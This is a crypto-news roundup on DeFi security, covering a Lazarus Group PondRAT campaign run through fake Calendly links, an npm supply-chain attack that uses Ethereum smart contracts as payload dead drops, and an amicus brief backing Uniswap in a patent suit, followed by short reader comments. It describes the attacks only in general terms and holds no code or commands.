TL;DR
- North Korean Lazarus Group launches renewed social engineering campaign against DeFi protocol teams using fake Calendly links
- PondRAT trojan identified as primary payload, designed for long-term persistence in corporate environments
- npm supply chain attack embeds malware using Ethereum smart contracts as dead drops for malicious payloads
- DeFi Education Fund and Solana Policy Institute file amicus brief defending Uniswap in patent lawsuit
- Security incidents highlight growing sophistication of attacks targeting DeFi infrastructure
September 4, 2025, brought a stark reminder that as decentralized finance grows in scale and influence, it also becomes an increasingly attractive target for sophisticated threat actors. Two separate security developments — one involving a state-sponsored hacking group and the other a novel supply chain attack — underscore the evolving risks facing DeFi protocol teams and their users.
Lazarus Group Deploys PondRAT Against DeFi Organizations
Security researchers have identified a renewed campaign by North Korea’s Lazarus Group specifically targeting DeFi protocol contributors and developers. The attack vector leverages fake Calendly scheduling links to initiate contact with victims, creating a convincing pretext that exploits the remote-first, meeting-heavy culture of the crypto industry.
Once a target engages with the fraudulent scheduling page, they are prompted to download what appears to be a legitimate meeting application or plugin. The actual payload is PondRAT, a remote access trojan designed for extended persistence within corporate networks. Unlike typical malware that seeks immediate financial gain, PondRAT is built for long-term surveillance and credential harvesting — consistent with Lazarus Group’s well-documented strategy of infiltrating organizations before executing large-scale thefts.
The targeting of DeFi protocol contributors specifically indicates a strategic shift. Rather than attacking smart contracts directly, Lazarus appears to be focused on gaining access to protocol administration keys, multisig wallets, and internal governance mechanisms. This approach could enable thefts that bypass on-chain security measures entirely by compromising the human operators who control protocol upgrade paths and treasury management.
For DeFi organizations, the campaign reinforces the need for rigorous operational security practices, including hardware key management, segregated development environments, and mandatory security training for all team members who handle protocol infrastructure.
Ethereum Smart Contracts Weaponized in npm Supply Chain Attack
In a separate but equally concerning development, researchers have documented a supply chain attack that embeds malicious payloads within npm (Node Package Manager) libraries. The attack uses Ethereum smart contracts as a dead drop or retrieval mechanism for malware, representing a significant evolution in how blockchain infrastructure is being weaponized.
The attack chain works by publishing compromised npm packages that appear legitimate to developers building decentralized applications. When the package is installed and executed, it communicates with specific Ethereum smart contracts to retrieve malicious instructions or additional payloads. Because the command-and-control infrastructure lives on-chain, it is extremely difficult for traditional security tools to detect or block.
This technique exploits a fundamental tension in the DeFi ecosystem: the same blockchain infrastructure that provides transparency and immutability can also serve as an unblockable communication channel for malicious actors. Firewall rules and network monitoring — standard enterprise security measures — are ineffective against data retrieved directly from the Ethereum blockchain through RPC endpoints.
The attack represents a convergence of traditional software supply chain compromises with Web3-native techniques. Developers building DeFi protocols are particularly vulnerable because their workflows regularly involve installing and testing new packages from the npm ecosystem, and the use of Ethereum RPC connections is considered normal operational behavior.
Uniswap Patent Defense Draws Industry Support
Amid the security concerns, the DeFi community has rallied around a different kind of defense. The DeFi Education Fund (DEF) and the Solana Policy Institute have jointly filed an amicus brief supporting Uniswap in an ongoing patent infringement lawsuit. The filing argues against the patentability of mathematical formulas governing Automated Market Makers and exchange rate calculations.
The core argument is straightforward but consequential: if the mathematical models embedded in AMM code can be patented, it would fundamentally undermine the open-source ethos that has driven DeFi innovation. The ability to freely compose, fork, and iterate on protocol designs has been central to the rapid evolution of decentralized exchange mechanisms, lending protocols, and derivative platforms.
The amicus brief positions the lawsuit as a test case for the boundaries of intellectual property in decentralized finance. A ruling that validates broad AMM patents could create a chilling effect on protocol development, forcing builders to navigate a patent landscape that was never designed for composable, open-source financial infrastructure. Conversely, a decision favoring Uniswap could establish important precedents protecting the right to implement mathematical and algorithmic innovations in DeFi without fear of litigation.
Implications for DeFi Security Posture
The combination of the Lazarus social engineering campaign and the npm supply chain attack reveals a common theme: threat actors are increasingly targeting the human and software development layers of DeFi rather than the smart contracts themselves. This shift makes sense from an attacker’s perspective. Smart contract audits, formal verification, and bug bounty programs have made direct protocol exploits progressively harder to execute. In response, attackers are pivoting to the softer targets around the protocol — the developers, administrators, and tooling that keep DeFi systems running.
For the broader DeFi ecosystem, these incidents argue for a more holistic approach to security that extends beyond code audits. Organizations need to invest in operational security training, supply chain integrity verification, and incident response procedures that account for compromises at the infrastructure and personnel level. The era of treating smart contract security as synonymous with DeFi security is over.
Why This Matters
The security landscape of September 4, 2025, illustrates a maturing threat environment for decentralized finance. As DeFi protocols manage increasingly large treasuries and serve growing user bases, the incentives for sophisticated attacks will only increase. The Lazarus Group’s targeted approach and the novel use of blockchain infrastructure for malware delivery demonstrate that adversaries are evolving as quickly as the protocols they target. The industry’s response — through legal defenses, security research, and community coordination — will determine whether DeFi can maintain its resilience as it scales.
Disclaimer: This article is for informational purposes only and does not constitute financial or security advice. DeFi investments carry significant risk including smart contract vulnerabilities and market volatility. Always conduct your own research before participating in any DeFi protocol.
using ethereum smart contracts as dead drops is genuinely clever. lazarus keeps evolving their opsec
Every DeFi team should be running mandatory security training. Fake Calendly links should not be working in 2025.
^ hard to train everyone when most defi teams are 5 people working across 4 timezones wearing hoodies
The Uniswap amicus brief is the real story here. Patent trolls going after DeFi protocols is going to be the next big fight.